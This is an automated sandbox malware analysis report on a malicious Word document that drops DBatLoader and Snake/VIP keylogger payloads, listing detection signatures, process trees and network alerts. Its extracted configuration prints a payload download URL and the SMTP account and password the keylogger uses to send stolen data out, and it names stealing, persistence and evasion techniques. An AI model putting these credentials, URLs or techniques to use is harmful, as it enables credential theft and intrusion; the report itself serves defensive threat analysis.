Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ITT # KRPBV2663 .doc

Overview

General Information

Sample name:ITT # KRPBV2663 .doc
Analysis ID:1584675
MD5:754c08a32cbfe16e0982b5b56835e247
SHA1:7338cada263faae3d79631efa1c895bf690a4eb3
SHA256:d9980559077d0cf6e251608efa44277ac5cd2b64236ecc31b352a93992e2f2b7
Tags:docuser-abuse_ch
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for sample
Office process drops PE file
Office process queries suspicious COM object (likely to drop second stage)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 3732 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • brightness.exe (PID: 5560 cmdline: C:\Windows\SysWOW64\brightness.exe MD5: 6047499517804F1EA76B508CA469DE99)
      • cmd.exe (PID: 4676 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • jphwmyiA.pif (PID: 7208 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Aiymwhpj.PIF (PID: 7708 cmdline: "C:\Users\Public\Libraries\Aiymwhpj.PIF" MD5: 6047499517804F1EA76B508CA469DE99)
    • cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jphwmyiA.pif (PID: 7820 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Aiymwhpj.PIF (PID: 7920 cmdline: "C:\Users\Public\Libraries\Aiymwhpj.PIF" MD5: 6047499517804F1EA76B508CA469DE99)
    • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jphwmyiA.pif (PID: 8016 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2166181878.000000007FBB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 118 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.jphwmyiA.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
            19.1.jphwmyiA.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
            19.2.jphwmyiA.pif.22770ee8.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              19.2.jphwmyiA.pif.22770ee8.5.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                19.2.jphwmyiA.pif.22770ee8.5.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  Click to see the 270 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 5560, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                  Sigma detected: Execution from Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\jphwmyiA.pif, NewProcessName: C:\Users\Public\Libraries\jphwmyiA.pif, OriginalFileName: C:\Users\Public\Libraries\jphwmyiA.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 5560, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, ProcessId: 7208, ProcessName: jphwmyiA.pif
                  Sigma detected: File With Uncommon Extension Created By An Office Application
                  Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 3732, TargetFilename: C:\Windows\SysWOW64\brightness.exe
                  Sigma detected: Files With System Process Name In Unsuspected Locations
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 5560, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Aiymwhpj.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 5560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Aiymwhpj
                  Sigma detected: Parent in Public Folder Suspicious Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Aiymwhpj.PIF" , ParentImage: C:\Users\Public\Libraries\Aiymwhpj.PIF, ParentProcessId: 7708, ParentProcessName: Aiymwhpj.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 7760, ProcessName: cmd.exe
                  Sigma detected: Suspicious Program Location with Network Connections
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\jphwmyiA.pif, Initiated: true, ProcessId: 7208, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49723
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Aiymwhpj.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 5560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Aiymwhpj
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\jphwmyiA.pif, NewProcessName: C:\Users\Public\Libraries\jphwmyiA.pif, OriginalFileName: C:\Users\Public\Libraries\jphwmyiA.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 5560, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, ProcessId: 7208, ProcessName: jphwmyiA.pif
                  Sigma detected: Suspicious Office Outbound Connections
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49710, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 3732, Protocol: tcp, SourceIp: 147.124.216.113, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.198.176, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\jphwmyiA.pif, Initiated: true, ProcessId: 7208, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 53704

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-06T07:54:14.591406+010028033053Unknown Traffic192.168.2.549730188.114.97.3443TCP
                  2025-01-06T07:54:15.975264+010028033053Unknown Traffic192.168.2.549733188.114.97.3443TCP
                  2025-01-06T07:54:22.115322+010028033053Unknown Traffic192.168.2.553612188.114.97.3443TCP
                  2025-01-06T07:54:23.507981+010028033053Unknown Traffic192.168.2.553624188.114.97.3443TCP
                  2025-01-06T07:54:25.736960+010028033053Unknown Traffic192.168.2.553644188.114.97.3443TCP
                  2025-01-06T07:54:33.415581+010028033053Unknown Traffic192.168.2.553705188.114.97.3443TCP
                  2025-01-06T07:54:34.638891+010028033053Unknown Traffic192.168.2.553716188.114.97.3443TCP
                  2025-01-06T07:54:36.240323+010028033053Unknown Traffic192.168.2.553731188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-06T07:54:12.243144+010028032742Potentially Bad Traffic192.168.2.549723132.226.8.16980TCP
                  2025-01-06T07:54:14.133786+010028032742Potentially Bad Traffic192.168.2.549723132.226.8.16980TCP
                  2025-01-06T07:54:15.515041+010028032742Potentially Bad Traffic192.168.2.549731132.226.8.16980TCP
                  2025-01-06T07:54:16.930648+010028032742Potentially Bad Traffic192.168.2.549736132.226.8.16980TCP
                  2025-01-06T07:54:18.508728+010028032742Potentially Bad Traffic192.168.2.553584132.226.8.16980TCP
                  2025-01-06T07:54:23.990983+010028032742Potentially Bad Traffic192.168.2.553623132.226.8.16980TCP
                  2025-01-06T07:54:25.170046+010028032742Potentially Bad Traffic192.168.2.553623132.226.8.16980TCP
                  2025-01-06T07:54:26.967936+010028032742Potentially Bad Traffic192.168.2.553650132.226.8.16980TCP
                  2025-01-06T07:54:28.402962+010028032742Potentially Bad Traffic192.168.2.553662132.226.8.16980TCP
                  2025-01-06T07:54:29.896406+010028032742Potentially Bad Traffic192.168.2.553671132.226.8.16980TCP
                  2025-01-06T07:54:31.399524+010028032742Potentially Bad Traffic192.168.2.553681132.226.8.16980TCP
                  2025-01-06T07:54:31.412893+010028032742Potentially Bad Traffic192.168.2.553683132.226.8.16980TCP
                  2025-01-06T07:54:32.647270+010028032742Potentially Bad Traffic192.168.2.553694132.226.8.16980TCP
                  2025-01-06T07:54:32.866022+010028032742Potentially Bad Traffic192.168.2.553681132.226.8.16980TCP
                  2025-01-06T07:54:33.990289+010028032742Potentially Bad Traffic192.168.2.553709132.226.8.16980TCP
                  2025-01-06T07:54:34.256624+010028032742Potentially Bad Traffic192.168.2.553711132.226.8.16980TCP
                  2025-01-06T07:54:35.694139+010028032742Potentially Bad Traffic192.168.2.553724132.226.8.16980TCP
                  2025-01-06T07:54:37.084764+010028032742Potentially Bad Traffic192.168.2.553738132.226.8.16980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-06T07:54:25.816325+010018100071Potentially Bad Traffic192.168.2.553643149.154.167.220443TCP
                  2025-01-06T07:54:36.927393+010018100071Potentially Bad Traffic192.168.2.553734149.154.167.220443TCP
                  2025-01-06T07:54:44.379776+010018100071Potentially Bad Traffic192.168.2.553795149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: ITT # KRPBV2663 .docAvira: detected
                  Found malware configuration
                  Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}
                  Source: 7.0.brightness.exe.400000.0.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFReversingLabs: Detection: 26%
                  Source: C:\Windows\SysWOW64\brightness.exeReversingLabs: Detection: 26%
                  Multi AV Scanner detection for submitted file
                  Source: ITT # KRPBV2663 .docReversingLabs: Detection: 47%
                  Source: ITT # KRPBV2663 .docVirustotal: Detection: 56%Perma Link
                  Machine Learning detection for sample
                  Source: ITT # KRPBV2663 .docJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 10.2.jphwmyiA.pif.400000.0.unpack
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 15.2.jphwmyiA.pif.400000.0.unpack
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 19.2.jphwmyiA.pif.400000.1.unpack
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:53636 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:53696 version: TLS 1.0
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53643 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53795 version: TLS 1.2
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123335576.000000007F410000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.000000002064A000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2273558803.000000001A4F6000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2349806215.0000000020806000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.0000000021382000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2124248184.0000000000741000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123335576.000000007F410000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2245722852.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.000000002064A000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2245722852.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324467170.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324467170.0000000000821000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,7_2_027B58B4

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (creates forbidden files)
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to behavior
                  Document exploit detected (drops PE files)
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: brightness.exe.0.drJump to dropped file
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h10_2_20E5DC80
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 23F7F2B5h10_2_23F7F0C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 23F7FC3Fh10_2_23F7F0C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-40h]10_2_23F7FD28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 23F7E0C5h10_2_23F7E114
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_23F7E5E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 23F7E0C5h10_2_23F7DF07
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_23F7EDFB
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-40h]10_2_23F7FD20
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_23F7EC1B
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503185Dh10_2_25031440
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503CDE1h10_2_2503CB38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250310E9h10_2_25030E38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503E7F1h10_2_2503E548
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503B829h10_2_2503B580
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503EC49h10_2_2503E9A0
